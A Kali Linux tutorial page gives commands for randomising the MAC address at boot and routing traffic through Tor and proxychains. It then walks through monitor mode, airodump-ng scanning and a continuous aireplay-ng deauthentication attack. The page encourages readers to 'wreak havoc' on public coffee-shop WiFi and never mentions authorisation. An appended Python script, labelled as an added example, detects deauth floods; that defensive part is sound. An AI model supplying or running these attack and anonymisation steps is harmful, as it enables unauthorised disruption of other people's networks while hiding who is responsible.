Remember that you can find further information on any of the commands shown in this page by typing: man [tool] or [tool] --help
We can change the MAC address of our machine using macchanger. If we want the MAC address to change automatically every time we start Kali Linux, edit the crontab:

    crontab -e

and add this line:

    @reboot macchanger -A eth0

(-A will change our machine's MAC address to a random vendor MAC address)

Tor is an anonymizing overlay network for TCP traffic. To install Tor, type:

    apt-get install tor

Don't forget to start Tor before running any other pentesting command:

    service tor start

To check if Tor is running:

    service tor status

Proxychains is used to anonymize our internet activities. The Proxychains configuration file is /etc/proxychains.conf. Editing this file allows us to choose what type of proxies we will use. The preferred configuration to use with Tor is:
uncomment dynamic_chain
comment strict_chain
add at the end of the file: socks5 127.0.0.1 9050
With the above settings, it is said that we "torify" our actions. For instance, to launch firefox, nmap or any other command (except Metasploit), we type:

    service tor start
    proxychains firefox duckduckgo.com

    service tor start
    proxychains firefox dnsleaktest.com

First, we have to find our wireless network card device:

    ifconfig

In my case it is wlp3s0
By default, all network cards are in managed mode. In order to see all wireless access points, we have to change our network card to monitor mode:
    ifconfig wlp3s0 down
    iwconfig wlp3s0 mode monitor
    ifconfig wlp3s0 up

Now we have to kill some processes that may interfere with airodump-ng:

    airmon-ng check wlp3s0
    airmon-ng check kill

Now we have to scan for all the WiFi access points:

    airodump-ng wlp3s0

Now we have to scan a particular access point with the information gathered in the previous step:

    airodump-ng -c [CHANNEL] -w [FILE] --bssid [BSSID] wlp3s0

(replace [CHANNEL], [FILE] and [BSSID] with the actual values)
We'll see all devices (STATION MAC addresses) connected to the access point.
We can disrupt wifi connection on devices connected to a particular access point. Following the information gathered in previous steps, we can do:
    aireplay-ng -0 0 -a [BSSID] wlp3s0

This causes all devices connected to the [BSSID] access point to lose their WiFi connection. You can wreak havoc on a public WiFi network, like the one in a coffee shop.
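Seen from the defending side, the deauthentication frames that aireplay-ng -0 sends are easy to spot in a monitor-mode capture. The following is an added example, not part of the original page: it parses bare 802.11 frames and flags a burst of deauthentication frames per BSSID. The function names, the threshold and window values, and the sample frames are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict, deque

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(frame):
    """Return (dest, src, bssid, reason) for a deauthentication frame, else None.
    Assumes a bare 802.11 MAC frame with the radiotap header already stripped."""
    # Frame control byte 0 == 0xC0: version 0, type 0 (management), subtype 12 (deauth).
    if len(frame) < 26 or frame[0] != 0xC0:
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)  # reason code follows the 24-byte header
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def detect_floods(capture, threshold=10, window=1.0):
    """capture: time-ordered (timestamp_seconds, frame_bytes) pairs.
    Returns {bssid: time of first alert} for every BSSID that reaches `threshold`
    deauth frames within `window` seconds (both values are assumptions to tune)."""
    recent, alerts = defaultdict(deque), {}
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        q = recent[parsed[2]]
        q.append(ts)
        while ts - q[0] > window:      # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alerts.setdefault(parsed[2], ts)
    return alerts

def sample_frame(fc0, dest, src, bssid, reason=7):
    """Constructed test frame (sample data, not a real capture)."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return bytes([fc0, 0, 0, 0]) + raw(dest) + raw(src) + raw(bssid) + b"\x00\x00" + struct.pack("<H", reason)

AP, BCAST = "02:00:00:00:00:01", "ff:ff:ff:ff:ff:ff"
# Constructed capture: one ordinary disconnect, 20 beacons, then 30 broadcast deauths in 0.3 s.
SAMPLE = [(0.0, sample_frame(0xC0, "02:00:00:00:00:aa", AP, AP, reason=3))]
SAMPLE += [(1.0 + i * 0.1, sample_frame(0x80, BCAST, AP, AP)) for i in range(20)]
SAMPLE += [(5.0 + i * 0.01, sample_frame(0xC0, BCAST, AP, AP)) for i in range(30)]

if __name__ == "__main__":
    for bssid, ts in detect_floods(SAMPLE).items():
        print(f"deauth flood on {bssid} first flagged at t={ts:.2f}s")
```

A single deauthentication frame is normal when a client disconnects, which is why the check is rate-based rather than per-frame.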